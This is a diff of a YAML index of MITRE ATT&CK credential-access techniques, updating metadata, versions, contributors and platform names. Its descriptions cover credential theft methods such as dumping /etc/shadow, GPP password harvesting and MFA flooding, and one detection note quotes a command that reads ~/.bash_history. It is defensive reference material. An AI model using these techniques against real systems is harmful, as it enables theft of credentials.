-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46367,25 +47107,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -46459,7 +47217,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46521,11 +47278,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46574,6 +47330,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46582,6 +47339,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46592,13 +47350,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46654,44 +47413,11 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests: []
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46708,25 +47434,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -46801,11 +47556,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1606:
     technique:
-      modified: '2023-10-15T11:10:03.428Z'
+      modified: '2024-10-15T15:58:23.638Z'
       name: Forge Web Credentials
       description: "Adversaries may forge credential materials that can be used to
         gain access to web applications or Internet services. Web applications and
@@ -46849,11 +47603,10 @@ credential-access:
       - Windows
       - macOS
       - Linux
-      - Azure AD
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -46877,8 +47630,8 @@ credential-access:
         url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
       - source_name: GitHub AWS-ADFS-Credential-Generator
         description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
-          Retrieved December 16, 2020.
-        url: https://github.com/damianh/aws-adfs-credential-generator
+          Retrieved September 27, 2024.
+        url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
@@ -46894,11 +47647,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1621:
     technique:
-      modified: '2024-04-19T04:26:29.365Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication Request Generation
       description: |-
         Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -46909,11 +47661,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
       - Pawel Partyka, Microsoft 365 Defender
       - Shanief Webb
       - Obsidian Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
         logs for suspicious events: unusual login attempt source location, mismatch
@@ -46923,16 +47677,16 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
       - IaaS
       - SaaS
-      - Azure AD
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -46970,13 +47724,10 @@ credential-access:
         url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.008:
     technique:
-      modified: '2023-04-11T00:34:00.779Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Chat Messages
       description: |-
         Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -46985,6 +47736,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Douglas Weir
       x_mitre_deprecated: false
@@ -46992,11 +47744,11 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -47014,13 +47766,10 @@ credential-access:
         url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1212:
     technique:
-      modified: '2023-10-15T11:45:21.555Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Exploitation for Credential Access
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 
@@ -47033,6 +47782,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
       - Mohit Rathore
@@ -47046,12 +47796,13 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      - Azure AD
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Process: Process Creation'
@@ -47083,17 +47834,14 @@ credential-access:
         url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
       - source_name: Microsoft Midnight Blizzard Replay Attack
         description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
-          Retrieved September 27, 2023.
-        url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+          Retrieved September 12, 2024.
+        url: https://x.com/MsftSecIntel/status/1671579359994343425
       - source_name: Technet MS14-068
         description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
           Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
         url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -47166,12 +47914,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1110:
     technique:
-      modified: '2024-01-29T18:53:26.593Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Brute Force
       description: |-
         Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -47180,6 +47927,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - David Fiser, @anu4is, Trend Micro
       - Alfredo Oliveira, Trend Micro
@@ -47198,18 +47946,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
@@ -47233,13 +47981,10 @@ credential-access:
         url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.004:
     technique:
-      modified: '2024-03-07T14:28:02.910Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Credential Stuffing'
       description: |-
         Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -47265,6 +48010,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Diogo Fernandes
       - Anastasios Pingios
@@ -47276,18 +48022,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'User Account: User Account Authentication'
@@ -47306,14 +48052,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.004
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -47342,24 +48085,26 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -47394,13 +48139,10 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1187:
     technique:
-      modified: '2023-08-14T19:30:45.123Z'
+      modified: '2024-10-15T16:33:34.508Z'
       name: Forced Authentication
       description: |-
         Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -47478,14 +48220,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Server_Message_Block
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1187
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -47501,6 +48242,7 @@ credential-access:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -47509,13 +48251,13 @@ credential-access:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -47523,15 +48265,11 @@ credential-access:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -47542,9 +48280,8 @@ credential-access:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -47590,7 +48327,7 @@ credential-access:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -47609,17 +48346,16 @@ credential-access:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -47652,10 +48388,9 @@ credential-access:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -47692,11 +48427,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.006:
     technique:
-      modified: '2023-09-30T20:24:19.357Z'
+      modified: '2024-10-15T14:20:16.722Z'
       name: Cloud Secrets Management Stores
       description: "Adversaries may acquire credentials from cloud-native secret management
         solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -47764,34 +48498,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1003.008:
     technique:
-      x_mitre_platforms:
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
-      type: attack-pattern
-      created: '2020-02-11T18:46:56.263Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - url: https://attack.mitre.org/techniques/T1003/008
-        external_id: T1003.008
-        source_name: mitre-attack
-      - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
-          File Formats. Retrieved February 19, 2020.
-        url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
-        source_name: Linux Password and Shadow File Formats
-      - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
-          unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
-          2020.'
-        url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
-        source_name: nixCraft - John the Ripper
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-25T20:48:04.491Z'
       name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
       description: |
         Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
@@ -47800,20 +48510,42 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
         distributions, can be used to watch for hostile processes attempting to access
